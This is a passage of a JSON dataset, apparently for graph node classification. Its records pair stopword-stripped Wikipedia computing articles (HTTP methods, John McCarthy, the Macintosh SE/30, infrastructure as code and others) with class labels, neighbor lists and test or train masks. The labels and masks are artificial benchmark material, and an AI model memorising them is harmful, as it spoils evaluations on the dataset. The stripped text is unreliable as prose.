head post methods http/1.1 specification added five new methods options put delete trace connect specified documents semantics well-known depended client use method server configured support combination methods method unknown intermediate treated unsafe non-idempotent method limit number methods defined allows future methods specified without breaking existing infrastructure example webdav defined 7 new methods specified patch method method names case sensitive contrast http header field names case-insensitive general-purpose http servers required implement least get head methods methods considered optional specification methods example get head options trace convention defined safe means intended information retrieval change state server words side effects beyond relatively harmless effects logging web caching serving banner advertisements incrementing web counter making arbitrary get requests without regard context application state therefore considered safe however mandated standard explicitly acknowledged guaranteed contrast methods post put delete patch intended actions may cause side effects either server external side effects financial transactions transmission email methods therefore usually used conforming web robots web crawlers conform tend make requests without regard context consequences despite prescribed safety get requests practice handling server technically limited way therefore careless deliberate programming cause non-trivial changes server discouraged cause problems web caching search engines automated agents make unintended changes server example website might allow deletion resource url http //example.com/article/1234/delete arbitrarily fetched even using get would simply delete article one example occurring practice short-lived google web accelerator beta prefetched arbitrary urls page user viewing causing records automatically altered deleted en masse beta suspended weeks first release following widespread criticism methods put delete defined idempotent meaning multiple identical requests effect single request methods get head options trace prescribed safe also idempotent http stateless protocol contrast post method necessarily idempotent therefore sending identical post request multiple times may affect state cause side effects financial transactions cases may desirable cases could due accident user realize action result sending another request receive adequate feedback first request successful web browsers may show alert dialog boxes warn users cases reloading page may re-submit post request generally web application handle cases post request submitted note whether method idempotent enforced protocol web server perfectly possible write web application example database insert non-idempotent action triggered get request ignoring recommendation however may result undesirable consequences user agent assumes repeating request safe trace method used part class attacks known cross-site tracing reason common security advice disabled server configuration microsoft iis supports proprietary track method behaves similarly likewise recommended disabled response message consists following status line header fields must end cr lf empty line must consist cr lf whitespace strict requirement cr lf relaxed somewhat within message bodies consistent use system linebreaks cr lf alone http/1.0 since first line http response called status line includes numeric status code 404 textual reason phrase found way user agent handles response depends primarily code secondarily response header fields custom status codes used user agent encounters code recognize use first digit code determine general class response standard reason phrases recommendations replaced local equivalents web developer discretion status code indicated problem user agent might display reason phrase user provide information nature problem standard also allows user agent attempt interpret reason phrase though might unwise since standard explicitly specifies status codes machine-readable reason phrases human-readable http status code primarily divided five groups better explanation request responses client server named popular way establishing encrypted http connection https two methods establishing encrypted http connection also exist secure hypertext transfer protocol using http/1.1 upgrade header specify upgrade tls browser support two however nearly non-existent sample conversation http client http server running www.example.com port 80 client request consisting case request line one header field followed blank line request ends double newline form carriage return followed line feed host field distinguishes various dns names sharing single ip address allowing name-based virtual hosting optional http/1.0 mandatory http/1.1 means /index.html one etag entity tag header field used determine cached version requested resource identical current version resource server content-type specifies internet media type data conveyed http message content-length indicates length bytes http/1.1 webserver publishes ability respond requests certain byte ranges document setting field accept-ranges bytes useful client needs certain portions resource sent server called byte serving connection close sent means web server close tcp connection immediately transfer response header lines optional content-length missing length determined ways chunked transfer encoding uses chunk size 0 mark end content identity encoding without content-length reads content socket closed content-encoding like gzip used compress transmitted data gopher protocol content delivery protocol displaced http early 1990s spdy protocol alternative http developed google superseded new http protocol http/2",
    "neighbors": [
      10242,
      8211,
      10266,
      6171,
      10269,
      10271,
      35,
      2085,
      10284,
      8238,
      2098,
      2099,
      53,
      2106,
      4158,
      64,
      8265,
      6231,
      8281,
      10341,
      10344,
      113,
      115,
      119,
      2169,
      124,
      2182,
      8335,
      152,
      2206,
      8351,
      172,
      6318,
      6319,
      185,
      6330,
      2238,
      8386,
      6347,
      10452,
      4310,
      10461,
      6366,
      10462,
      225,
      4326,
      8432,
      10486,
      8443,
      10506,
      278,
      6456,
      8504,
      2362,
      6458,
      2373,
      10571,
      10579,
      4439,
      348,
      6493,
      10589,
      361,
      8554,
      10604,
      8557,
      367,
      6523,
      6524,
      2431,
      6528,
      10631,
      8584,
      8585,
      6541,
      4504,
      6559,
      10659,
      2470,
      6577,
      2485,
      444,
      8641,
      8644,
      8648,
      461,
      2509,
      4561,
      8669,
      8670,
      479,
      10722,
      10723,
      6629,
      487,
      10727,
      494,
      8689,
      6651,
      10748,
      513,
      6657,
      2564,
      4616,
      2579,
      6681,
      6682,
      6689,
      2596,
      10791,
      559,
      562,
      4658,
      4661,
      10808,
      6714,
      574,
      10816,
      6723,
      4687,
      10834,
      6747,
      6750,
      4723,
      4725,
      2679,
      4728,
      4729,
      637,
      4733,
      8837,
      649,
      2701,
      655,
      2705,
      10910,
      10924,
      4793,
      10938,
      4797,
      702,
      8905,
      6869,
      2777,
      8923,
      737,
      8929,
      4840,
      2797,
      751,
      2800,
      4847,
      8946,
      4863,
      4883,
      4893,
      8998,
      829,
      9029,
      2887,
      842,
      11082,
      2893,
      849,
      6993,
      2901,
      2904,
      7003,
      4956,
      865,
      871,
      11112,
      11126,
      891,
      2945,
      11147,
      11154,
      7067,
      5026,
      933,
      2983,
      944,
      2996,
      11189,
      9142,
      3006,
      5054,
      11198,
      11201,
      11210,
      9167,
      11218,
      5077,
      5078,
      3052,
      5102,
      7152,
      5114,
      5118,
      1030,
      9229,
      9233,
      9242,
      9248,
      3105,
      9251,
      7208,
      7212,
      7214,
      9269,
      11321,
      9275,
      3133,
      5181,
      7231,
      11332,
      1096,
      5196,
      9293,
      3187,
      3191,
      11387,
      3198,
      5246,
      5250,
      5251,
      7313,
      3218,
      9365,
      11413,
      7324,
      9380,
      9381,
      7337,
      7338,
      7340,
      9393,
      9394,
      11449,
      1211,
      7364,
      11466,
      1229,
      11469,
      9424,
      7391,
      3297,
      11509,
      3322,
      11515,
      1288,
      1297,
      7441,
      5402,
      5405,
      5407,
      9511,
      1325,
      5437,
      5449,
      3407,
      1363,
      5469,
      5470,
      5471,
      5472,
      3428,
      5482,
      11647,
      3462,
      7570,
      7572,
      11674,
      5531,
      1436,
      5543,
      7592,
      1468,
      9670,
      5593,
      5605,
      3564,
      1520,
      5622,
      3580,
      9726,
      3592,
      9736,
      9744,
      1556,
      9757,
      7713,
      9770,
      5677,
      1586,
      3639,
      3643,
      5700,
      5707,
      3673,
      5724,
      7784,
      1642,
      9834,
      3695,
      9841,
      9843,
      1664,
      9860,
      9867,
      9868,
      1692,
      3742,
      3744,
      3751,
      3752,
      9908,
      9909,
      7865,
      5830,
      7885,
      1747,
      5843,
      9941,
      5849,
      3813,
      5875,
      5884,
      9987,
      3847,
      7943,
      1802,
      1803,
      10004,
      10005,
      7965,
      10020,
      1834,
      10026,
      5934,
      7984,
      10033,
      10035,
      3909,
      10057,
      10058,
      5964,
      3920,
      1876,
      5983,
      1893,
      3941,
      6000,
      3971,
      10115,
      8070,
      8080,
      1944,
      10144,
      10171,
      6086,
      4045,
      4048,
      2003,
      2016,
      8169,
      4085,
      6133,
      4095
    ],
    "mask": "Test"
  },
  {
    "node_id": 4798,
    "label": 4,
    "text": "National_Information_Assurance_Certification_and_Accreditation_Process:national information assurance certification accreditation process national information assurance certification accreditation process niacap formerly minimum-standard process certification accreditation computer telecommunications systems handle u.s. national-security information niacap derived department defense certification accreditation process ditscap played key role national information assurance partnership committee national security systems cnss policy cnssp 22 dated january 2012 cancelled cnss policy 6 “ national policy certification accreditation national security systems ” dated october 2005 national security telecommunications information systems security instruction nstissi 1000 “ national information assurance certification accreditation process niacap ” dated april 2000 cnssp 22 also states cnss intends adopt national institute standards technology nist issuances applicable additional cnss issuances occur needs nss sufficiently addressed nist document annex b identifies guidance documents includes nist special publications sp establishing organization-wide risk management program directs organization make use nist special publication 800-37 implies risk management framework rmf step 5 – authorize information system replaces certification accreditation process national security systems areas federal government fall sp 800-37 rev 1",
    "neighbors": [
      7528,
      5865,
      1875,
      8627,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 4799,
    "label": 9,
    "text": "John_McCarthy_(computer_scientist):john mccarthy computer scientist john mccarthy september 4 1927 – october 24 2011 american computer scientist cognitive scientist mccarthy one founders discipline artificial intelligence coined term artificial intelligence ai developed lisp programming language family significantly influenced design algol programming language popularized timesharing influential early development ai mccarthy spent career stanford university received many accolades honors 1971 turing award contributions topic ai united states national medal science kyoto prize john mccarthy born boston massachusetts september 4 1927 irish immigrant father lithuanian jewish immigrant mother john patrick ida glatt mccarthy family obliged relocate frequently great depression mccarthy father found work organizer amalgamated clothing workers los angeles california father came fishing village cromane county kerry ireland mother died 1957 mccarthy exceptionally intelligent graduated belmont high school two years early mccarthy accepted caltech 1944 mccarthy showed early aptitude mathematics teens taught college mathematics studying textbooks used nearby california institute technology caltech result able skip first two years mathematics caltech mccarthy suspended caltech failure attend physical education courses served us army readmitted receiving b.s mathematics 1948 caltech attended lecture john von neumann inspired future endeavors mccarthy initially completed graduate studies caltech moving princeton university received ph.d. mathematics institution 1951 student solomon lefschetz short-term appointments princeton stanford university mccarthy became assistant professor dartmouth 1955 year later mccarthy moved mit research fellow autumn 1956 1962 mccarthy became full professor stanford remained retirement 2000 end early days mit already affectionately referred uncle john students mccarthy championed mathematical logic artificial intelligence john mccarthy one founding fathers artificial intelligence together alan turing marvin minsky allen newell herbert a. simon mccarthy coined term artificial intelligence 1955 organized famous dartmouth conference summer 1956 conference started ai field minsky later joined mccarthy mit 1959 1958 proposed advice taker inspired later work question-answering logic programming john mccarthy invented lisp late 1950s based lambda calculus lisp soon became programming language choice ai applications publication 1960 1958 mccarthy served acm ad hoc committee languages became part committee designed algol 60 august 1959 proposed use recursion conditional expressions became part algol around 1959 invented so-called garbage collection methods solve problems lisp helped motivate creation project mac mit worked stanford university helped establish stanford ai laboratory many years friendly rival project mac mccarthy instrumental creation three earliest time-sharing systems compatible time-sharing system bbn time-sharing system dartmouth time sharing system colleague lester earnest told los angeles times internet would happened nearly soon except fact john initiated development time-sharing systems keep inventing new names time-sharing came called servers ... call cloud computing still time-sharing john started 1961 perhaps first suggest publicly idea utility computing speech given celebrate mit centennial computer time-sharing technology might result future computing power even specific applications could sold utility business model like water electricity idea computer information utility popular late 1960s faded mid-1990s however since 2000 idea resurfaced new forms see application service provider grid computing cloud computing 1966 mccarthy team stanford wrote computer program used play series chess games counterparts soviet union mccarthy team lost two games drew two games see kotok-mccarthy 1978 1986 mccarthy developed circumscription method non-monotonic reasoning 1982 seems originated idea space fountain type tower extending space kept vertical outward force stream pellets propelled earth along sort conveyor belt returns pellets earth payloads would ride conveyor belt upward mccarthy often commented world affairs usenet forums ideas found sustainability web page aimed showing human material progress desirable sustainable mccarthy serious book reader optimist staunch supporter free speech best usenet interaction visible rec.arts.books archives john actively attended sf bay area dinners palo alto r.a.b readers called rab-fests john went defend free speech criticism involving european ethnic jokes stanford mccarthy saw importance mathematics mathematics education usenet .sig years refuses arithmetic doomed talk nonsense license plate cover read similarly arithmetic doomed talk nonsense advised 30 phd graduates 2001 short story robot baby farcically explored question whether robots simulate emotions anticipated aspects internet culture social networking become increasingly prominent ensuing decades mccarthy married three times second wife vera watson programmer mountaineer died 1978 attempting scale annapurna part all-women expedition organised arlene blum later married carolyn talcott computer scientist stanford later sri international mccarthy considered atheist raised communist became conservative republican two-day visit czechoslovakia 1968 soviet invasion mccarthy died home stanford october 24 2011 1979 mccarthy wrote article entitled ascribing mental qualities machines wrote machines simple thermostats said beliefs beliefs seems characteristic machines capable problem-solving performance 1980 philosopher john searle responded famous chinese room argument disagreeing mccarthy taking stance machines beliefs simply conscious searle argues machines lack understanding intentionality term commonly used philosophy mind vast amount literature written support one side",
    "neighbors": [
      512,
      10752,
      11269,
      2056,
      2062,
      9231,
      7184,
      2577,
      9749,
      8728,
      4633,
      4122,
      8226,
      4643,
      3119,
      5684,
      2105,
      3132,
      6717,
      8258,
      8771,
      70,
      1610,
      1611,
      588,
      1613,
      9299,
      10841,
      3675,
      7775,
      4194,
      7267,
      2660,
      8293,
      9315,
      2666,
      3698,
      5751,
      7805,
      1159,
      9865,
      9877,
      1702,
      4774,
      5803,
      8879,
      2225,
      6840,
      7867,
      4800,
      6856,
      7880,
      8908,
      205,
      5837,
      5852,
      10463,
      7392,
      7904,
      11488,
      11495,
      2283,
      2798,
      4846,
      5360,
      5361,
      9969,
      8435,
      1783,
      9975,
      6906,
      2304,
      4865,
      4867,
      3334,
      6919,
      3336,
      11020,
      10510,
      1301,
      3350,
      10012,
      3869,
      2335,
      8479,
      2849,
      3370,
      7981,
      7983,
      2352,
      10547,
      311,
      10040,
      6969,
      3389,
      10049,
      4930,
      11075,
      5956,
      3408,
      6994,
      1365,
      2392,
      1883,
      10083,
      6502,
      11625,
      4981,
      3446,
      10104,
      377,
      8057,
      4992,
      10630,
      7048,
      7562,
      4492,
      1947,
      6556,
      6047,
      1952,
      8609,
      4516,
      5031,
      1448,
      5033,
      9128,
      10668,
      2482,
      1976,
      7616,
      5569,
      6594,
      4550,
      3529,
      5585,
      11218,
      10712,
      3034,
      11226,
      11242,
      3051,
      5611,
      9714,
      7670,
      11255,
      511
    ],
    "mask": "None"
  },
  {
    "node_id": 4800,
    "label": 9,
    "text": "Amir_Pnueli:amir pnueli amir pnueli april 22 1941 – november 2 2009 israeli computer scientist 1996 turing award recipient pnueli born nahalal british mandate palestine israel received bachelor degree mathematics technion haifa ph.d. applied mathematics weizmann institute science thesis topic calculation tides ocean switched computer science stint post-doctoral fellow stanford university works computer science focused temporal logic model checking particularly regarding fairness properties concurrent systems returned israel researcher founder first chair computer science department tel aviv university became professor computer science weizmann institute 1981 1999 death pnueli also held position computer science department new york university new york u.s.. pnueli also founded two startup technology companies career three children death four grandchildren pnueli died november 2 2009 brain hemorrhage",
    "neighbors": [
      7048,
      11020,
      10668,
      2482,
      1976,
      2238,
      4799,
      10049,
      4930,
      70,
      3529,
      1883,
      7775,
      9315,
      11242,
      2283,
      2798,
      1783,
      511
    ],
    "mask": "None"
  },
  {
    "node_id": 4801,
    "label": 6,
    "text": "Cryptmount:cryptmount cryptmount software tool managing encrypted file systems linux family operating systems uses device mapper dm-crypt infrastructure provide transparent encryption file systems stored disk partitions within ordinary files main features codice_1 include",
    "neighbors": [
      9762,
      7983,
      5840,
      11568,
      7794,
      823,
      9882,
      700,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 4802,
    "label": 7,
    "text": "Infrastructure_as_code:infrastructure code infrastructure code iac process managing provisioning computer data centers machine-readable definition files rather physical hardware configuration interactive configuration tools infrastructure managed comprises physical equipment bare-metal servers well virtual machines associated configuration resources definitions may version control system use either scripts declarative definitions rather manual processes term often used promote declarative approaches iac approaches promoted cloud computing sometimes marketed infrastructure service iaas iac supports iaas confused iac grew response difficulty posed two pieces technology – utility computing second-generation web frameworks 2006 launch amazon web services ’ elastic compute cloud 1.0 version ruby rails months brought widespread scaling problems many enterprises problems previously witnessed huge companies new tools emerging handle ever growing field idea iac born thought modelling infrastructure code ability design implement deploy applications infrastructure known software best practices appealed software developers infrastructure administrators ability treat like code use tools software project would allow developers rapidly deploy applications value iac broken three measurable categories cost reduction speed faster execution risk remove errors security violations cost reduction aims helping enterprise financially also terms people effort meaning removing manual component people able refocus efforts towards enterprise tasks infrastructure automation enables speed faster execution configuring infrastructure aims providing visibility help teams across enterprise work quickly efficiently automation removes risk associated human error like manual misconfiguration removing decrease downtime increase reliability outcomes attributes help enterprise move towards implementing culture devops combined working development operations generally three approaches iac declarative functional vs. imperative procedural vs. intelligent environment aware difference declarative imperative intelligent approach essentially 'what versus 'how versus 'why declarative approach focuses eventual target configuration imperative focuses infrastructure changed meet intelligent approach focuses configuration certain way consideration co-relationships co-dependencies multiple applications running infrastructure typically found production declarative approach defines desired state system executes needs happen achieve desired state imperative defines specific commands need executed appropriate order end desired conclusion intelligent determines correct desired state system executes needs happen achieve desired state impact co-dependent applications environment aware desired state next generation iac two methods iac 'push 'pull main difference manner servers told configured pull method server configured pull configuration controlling server push method controlling server pushes configuration destination system many tools fulfill infrastructure automation capabilities use iac broadly speaking framework tool performs changes configures infrastructure declaratively imperatively based programmatic approach considered iac traditionally server lifecycle automation configuration management tools used accomplish iac enterprises also using continuous configuration automation tools stand-alone iac frameworks microsoft ’ powershell dsc aws cloudformation continuous configuration automation cca tools thought extension traditional iac frameworks leverage iac change configure automate infrastructure also provide visibility efficiency flexibility infrastructure managed additional attributes provide enterprise-level security compliance making companies keen implementing types tools important aspect considering cca tools open source community content gartner states value cca tools “ dependent user-community-contributed content support commercial maturity performance automation tooling. ” vendors like puppet chef around significant amount time created communities chef chef community repository puppet puppetforge vendors rely adjacent communities leverage iac frameworks powershell dsc new vendors emerging content driven model driven intelligence product deliver content visual object-oriented systems work well developers especially useful production oriented devops operations constituents value models versus scripting content field continues develop change community based content become ever important iac tools used unless model driven object oriented notable cca tools include iac key attribute enabling best practices devops – developers become involved defining configuration ops teams get involved earlier development process tools utilize iac bring visibility state configuration servers ultimately provide visibility users within enterprise aiming bring teams together maximize efforts automation general aims take confusion error-prone aspect manual processes make efficient productive allowing better software applications created flexibility less downtime overall cost effective way company iac intended reduce complexity kills efficiency manual configuration automation collaboration considered central points devops infrastructure automation tools often included components devops toolchain",
    "neighbors": [
      4194,
      8581,
      6856,
      5770,
      8554,
      1004,
      4429,
      7628,
      7248,
      1435,
      9948,
      9245
    ],
    "mask": "None"
  },
  {
    "node_id": 4803,
    "label": 2,
    "text": "CPU_shielding:cpu shielding cpu shielding practice multiprocessor system cpu multiple cores real-time tasks run one cpu core non-real-time tasks run another operating system must able set cpu affinity processes interrupts linux order shield cpus individual interrupts serviced make sure following kernel configuration parameter set",
    "neighbors": [
      7938,
      7812,
      8326,
      4360,
      4493,
      2195,
      11155,
      1813,
      10780,
      1694,
      3618,
      4011,
      9646,
      7983,
      10675,
      823,
      9660,
      10817,
      4423,
      5067,
      5457,
      8147,
      1761,
      4841,
      1776
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4804,
    "label": 2,
    "text": "Dominic_Giampaolo:dominic giampaolo dominic p. giampaolo software developer helped develop file system operating system beos currently works apple inc. graduating lewiston high school lewiston maine 1987 started studying political science american university washington dc changed computer science one semester completing bachelor degree master degree worcester polytechnic institute graduating travelled west coast work silicon graphics advanced systems division worked group ported irix 64-bit r8000 microprocessor chip set worked realityengine infinitereality graphics systems working silicon graphics located fixed bug discreet logic flame compositing system delaying post-production motion picture speed october 1995 giampaolo heard bebox friend poker game shortly visiting inc. offices see demo computer began working beos working initially number areas including kernel posix layer notably developing file system alongside cyril meurillon replaced old file system written benoit schillings replaced original flat file system written meurillon file system included number advances compared personal computer filesystems use time journal improve reliability support extensive metadata indexed respond quickly searches giampaolo worked google qnx software systems qnx discovered bug instruction fetch unit intel pentium ii pentium iii processors since march 2002 giampaolo working apple inc. part mac os x file system apple file system project spotlight groups",
    "neighbors": [
      9762,
      10051,
      5293,
      3312,
      6256,
      8114,
      9335,
      4665
    ],
    "mask": "None"
  },
  {
    "node_id": 4805,
    "label": 3,
    "text": "Socket_5:socket 5 socket 5 created second generation intel p5 pentium processors operating speeds 75 120 mhz well certain pentium overdrive pentium mmx processors core voltage 3.3 v. superseded earlier socket 4 released march 1994 consisting 320 pins first socket use staggered pin grid array spga allowed chip pins spaced closer together earlier sockets socket 5 replaced socket 7 1997",
    "neighbors": [
      3588,
      1677,
      5901,
      8851,
      4246,
      2455,
      3992,
      8855,
      11417,
      3995,
      4252,
      6175,
      7714,
      10019,
      4523,
      2604,
      2350,
      6192,
      9649,
      4537,
      2874,
      7105,
      7110,
      8394,
      3403,
      4427,
      4179,
      3798,
      4185,
      473,
      7002,
      9945,
      11484,
      9570,
      10468,
      613,
      8552,
      1260,
      4717,
      10225,
      371,
      9592,
      8442
    ],
    "mask": "Test"
  },
  {
    "node_id": 4806,
    "label": 4,
    "text": "Information_Exchange_Gateway:information exchange gateway nato defined concept information exchange gateway ieg facilitate secure communication different security management domains ieg designed provide standard secure method communication nato nato nations non-nato nations coalition forces non government organisations ngos international organisations ios information exchange gateway provides information exchange services ies facilitate exchange information networks including data protocol translation necessary information protection services ips ensure intended information exchanged addition node protection services nps ensure information exchanged safe secure way intended information validated ips exchanged nato defined five main ieg scenarios scenario variants transferring classified information scenarios take account security classifications domains connect well security policy owners administrators domains scenarios ieg must include guard provide ips nps functions used guard ieg dmz split two",
    "neighbors": [
      5608,
      3930,
      6110
    ],
    "mask": "Test"
  },
  {
    "node_id": 4807,
    "label": 3,
    "text": "Macintosh_SE/30:macintosh se/30 macintosh se/30 personal computer designed manufactured sold apple computer inc. january 1989 october 1991 fastest original black-and-white compact macintosh series se/30 black-and-white monitor single pds slot rather nubus slots iix se/30 shares common architecture supported third-party accelerators network cards display adapter although officially able support 32 mb se/30 could expand 128 mb ram significant amount ram time included 40 80 mb hard drive also first compact mac include 1.44 mb high density floppy disk drive standard late versions se one earlier versions power se/30 demonstrated use produce week newspaper first colour tabloid newspaper uk use new digital pre-press technology personal desktop computer keeping apple practice apple ii+ power macintosh g3 announced logic board upgrade available convert regular se se/30 se would exactly specs se/30 difference floppy drive se 800 kb drive set included new front bezel replace original se bezel se/30 naming scheme used time apple indicated presence 68030 processor adding letter x model name macintosh se upgraded 68030 processor posed awkward problem apple willing name new computer macintosh sex thus se/30 name chosen internally code names green jade fafnir roadrunner used machine followed 1991 macintosh classic ii despite processor clock speed 60 fast se/30 due 16-bit data path supported 10 mb memory lacked internal expansion slot made motorola 68882 fpu optional upgrade although uses 32-bit instructions se/30 rom like iix rom includes code using 24-bit addressing rendering rom 32-bit dirty limited actual amount ram accessed 8 mb system 6.0.8 system extension called mode32 enables access installed extra memory system 6.0.8 system 7.0 system 7.5.5 se/30 use 128 mb ram alternatively replacing rom simm one mac iisi mac iifx makes se/30 32-bit-clean thereby enables use 128 mb ram system 7.5 os 8.1 standard se/30 run system 7.5.5 since mac os 7.6 requires 32-bit-clean rom additionally se/30 run a/ux apple older version unix able run macintosh programs though official upgrade path se/30 several third-party processor upgrades available 68040 upgrade made possible run mac os 8.1 extended se/30 productive life many years micron technology xceed gray-scale 30 video card fit se/30 pds slot enabling display greyscale video internal display non-color compact mac able bruce f. webster wrote macworld march 1989 se/30 break new ground however establish apple commitment classic mac product line provides users apple-supported alternative either small slow mac large powerful one important fills gap macintosh family ... new level power portability macintosh community january 2009 macworld feature commemorating 25th anniversary macintosh three industry commentators – adam c. engst tidbits john gruber daring fireball john siracusa ars technica – chose se/30 favorite mac model time like great mac wrote gruber se/30 n't terrific system debuted remained eminently usable years come think original mac era machine mind se/30 se/30 remains popular hobbyists described “ best computer apple ever make ” used models selling significant premium machines era contemporary pds upgrades allowed se/30 ’ internal monitor upgraded support 256 shades gray original-design macintosh support upgrade 68040 processor se/30 ’ standard ram limit 128mb greatly exceeded even much later models color classic macintosh lc ii 2018 add-ons software became available add wifi even streaming spotify support se/30 nbc tv series seinfeld jerry se/30 sitting desk first seasons would first many macs occupy desk including powerbook duo twentieth anniversary macintosh fx series always sunny philadelphia waitress seen macintosh se/30 bedroom desk episode gang gives back film watchmen ozymandias all-black tempest-shielded se/30 desk film peter parker shown macintosh se/30 bedroom",
    "neighbors": [
      7697,
      4114,
      6165,
      11289,
      7706,
      8222,
      1057,
      6183,
      1576,
      4139,
      7211,
      8253,
      576,
      1090,
      4180,
      10838,
      10840,
      9312,
      8806,
      6258,
      10357,
      4220,
      10365,
      10878,
      6783,
      7299,
      4741,
      8842,
      6283,
      7824,
      147,
      7830,
      6807,
      4258,
      7842,
      7844,
      3241,
      7869,
      8893,
      8896,
      4810,
      1744,
      3293,
      9952,
      6884,
      6377,
      1772,
      1776,
      10481,
      1290,
      781,
      4879,
      784,
      2839,
      8480,
      10023,
      4910,
      7983,
      11066,
      9022,
      10562,
      8525,
      2388,
      8534,
      3928,
      8540,
      6495,
      8544,
      7527,
      11629,
      10608,
      9084,
      7549,
      11649,
      3977,
      6539,
      1428,
      3483,
      2979,
      11171,
      8109,
      1970,
      446,
      5058,
      10691,
      1482,
      6608,
      8662,
      9174,
      9686,
      8665,
      10199,
      9182,
      2023,
      5616,
      10224,
      6130,
      2551,
      2553,
      8700,
      1534
    ],
    "mask": "Test"
  },
  {
    "node_id": 4808,
    "label": 9,
    "text": "TSP_(econometrics_software):tsp econometrics software tsp programming language estimation simulation econometric models tsp stands time series processor although also commonly used cross section panel data program initially developed robert hall graduate studies massachusetts institute technology 1960s company behind program tsp international founded 1978 bronwyn h. hall robert hall wife divorce april 1983 asset tsp split two versions subsequently two versions diverged terms interface types subroutines included one version tsp still developed tsp international version initially named microtsp named eviews developed quantitative micro software",
    "neighbors": [
      5129,
      7945,
      3980,
      2317,
      6797,
      7950,
      2457,
      7580,
      7326,
      7983,
      6962,
      823,
      6718,
      5830,
      5703,
      8262,
      5833,
      5450,
      2000,
      9944,
      2652,
      10848,
      4840,
      363,
      5612,
      7924
    ],
    "mask": "Test"
  },
  {
    "node_id": 4809,
    "label": 7,
    "text": "Access_Grid:access grid access grid collection resources technologies enables large format audio video based collaboration groups people different locations access grid ensemble resources including multimedia large-format displays presentation interactive environments interfaces grid computing middleware visualization environments simple terms advanced videoconferencing using big displays multiple simultaneous camera feeds node site technology invented argonne national laboratory chicago alliance chautauqua 99 series two-day conferences computational science organised ncsa first large-scale access grid event access grid later demonstrated supercomputing'99 portland international audience latest stable version software release 3.2 also installable bundle additional video codecs hd additional tools access grid generated great interest activity australia factors widely disparate geographic locations relatively low population-densities previously presented great obstacles in-person collaborations international centre excellence education mathematics ice-em funded 10 australian universities construct nodes nodes allow mathematics postgraduate community professionals access international experts visiting australia nodes also provide means carrying collaborative research peers within australia internationally australia first access grid node built sydney vislab australian technology park august 2001 2007 australian ag network grown 30 sites serviced asia pacific access grid apag venue servers university sydney ag2 university queensland ag3 university queensland began providing ag facilities 2002 increasing usage every year since 2004 uq vislab began providing access grid installation packages various linux distributions well freebsd wider ag community although intellectual property concerns placed future linux-based technologies doubt also active developing various enhancements add-ons including shared applications remote sensor monitoring shared application remote thermo shared gis based grass december 2006 new zealand university operational ag node use grid increasing current development work includes federated data management using storage resource broker srb high definition video communications uk academic community support access grid toolkit iocom evo technologies janet provided janet videoconferencing management centre first access grid ag node built university manchester 2001 jisc-funded support access grid support centre agsc manchester april 2004 july 2011 three hundred ag nodes registered uk ranging full room nodes small individual desktop nodes number academic projects using ag technologies taught course centre magic postgraduate mathematics mathematics projects",
    "neighbors": [
      10641,
      8122,
      5956,
      7407
    ],
    "mask": "Train"
  },
  {
    "node_id": 4810,
    "label": 3,
    "text": "Macintosh_IIci:macintosh iici macintosh iici personal computer designed manufactured sold apple computer inc. september 1989 february 1993 powerful version macintosh iicx released earlier year shares compact case design three expansion slots iici improved upon iicx 16 mhz motorola 68030 cpu 68882 fpu replacing 25 mhz versions chips macintosh quadra 700 introduced end 1991 apple mainstream workstation product replace iici albeit significantly higher price point time apple authorized resellers offering entry-level iici systems 4,000 usd less whereas quadra 700 entered market 6,000 usd apple continued sell iici early 1993 less expensive quadra 650 comparably-priced quadra 800 introduced iici introduced several technical architectural enhancements important preparing system 7 called blue project would influence future macintoshes though came cost compatibility iici one popular longest-lived macintosh models 20th century much lifespan business workhorse macintosh line short time 1989 introduction 40 mhz macintosh iifx iici fastest mac available iici came either 40- 80-megabyte hard disk possible upgrades include 25 33 40 50 mhz daystar 68030 boards quadra 700 motherboard couple different third-party 68040 upgrades two powerpc 601 upgrade cards running either 66 mhz 100 mhz exclusively daystar digital bought xlr8 still holds daystar product logo name line products 68030 68040 upgrades also made sonnet diimo companies quadra 700 released 1991 logic board upgrade made available iici upgrade performance level quadra easter egg exists iici rom system date set september 20 1989 machine release date keys held boot time image development team displayed signatures product design team seen molded plastic case one removes motherboard",
    "neighbors": [
      7697,
      4114,
      6165,
      11289,
      7706,
      8222,
      1057,
      6183,
      1576,
      4139,
      7211,
      1592,
      8253,
      576,
      1090,
      4180,
      10838,
      10840,
      9312,
      8806,
      6258,
      10357,
      4220,
      10365,
      10878,
      6783,
      7299,
      4741,
      8842,
      6283,
      7824,
      147,
      7830,
      6807,
      4258,
      7842,
      7844,
      7869,
      8893,
      8896,
      4807,
      1744,
      3293,
      9952,
      6884,
      6377,
      1772,
      1776,
      10481,
      1290,
      781,
      4879,
      784,
      8480,
      10023,
      4910,
      7983,
      11066,
      9022,
      10562,
      8525,
      2388,
      8534,
      3928,
      8540,
      6495,
      8544,
      11629,
      10608,
      9084,
      7549,
      11649,
      3977,
      6539,
      1428,
      3483,
      2979,
      11171,
      8109,
      1461,
      446,
      5058,
      10691,
      1482,
      6608,
      8662,
      9174,
      9686,
      8665,
      10199,
      9182,
      2023,
      10734,
      5616,
      10224,
      6130,
      2551,
      2553,
      8700,
      1534
    ],
    "mask": "Test"
  },
  {
    "node_id": 4811,
    "label": 1,
    "text": "In-memory_processing:in-memory processing computer science in-memory processing emerging technology processing data stored in-memory database older systems based disk storage relational databases using sql query language increasingly regarded inadequate meet business intelligence bi needs stored data accessed much quickly placed random-access memory ram flash memory in-memory processing allows data analysed real time enabling faster reporting decision-making business hitherto prevalent disk-based technology data loaded computer hard disk form multiple tables multi-dimensional structures queries run disk-based technologies relational database management systems rdms often based structured query language sql sql server mysql oracle many others rdms designed requirements transactional processing using database supports insertions updates well performing aggregations joins typical bi solutions typically slow another drawback sql designed efficiently fetch rows data bi queries usually involve fetching partial rows data involving heavy calculations improve query performance multidimensional databases olap cubes also called multidimensional online analytical processing molap constructed designing cube elaborate lengthy process changing cube structure adapt dynamically changing business needs may cumbersome cubes pre-populated data answer specific queries although increase performance still suitable answering ad-hoc queries information technology staff spend substantial development time optimizing databases constructing indexes aggregates designing cubes star schemas data modeling query analysis reading data hard disk much slower possibly hundreds times compared reading data ram especially analyzing large volumes data performance severely degraded though sql powerful tool complex queries take relatively long time execute often result bringing performance transactional processing order obtain results within acceptable response time many data warehouses designed pre-calculate summaries answer specific queries optimized aggregation algorithms needed increase performance memory processing accomplished via traditional databases oracle db2 microsoft sql server via nosql offerings in-memory data grid like hazelcast infinispan oracle coherence scaleout software in-memory database data grid information initially loaded memory ram flash memory instead hard disks data grid processing occurs three order magnitude faster relational databases advanced 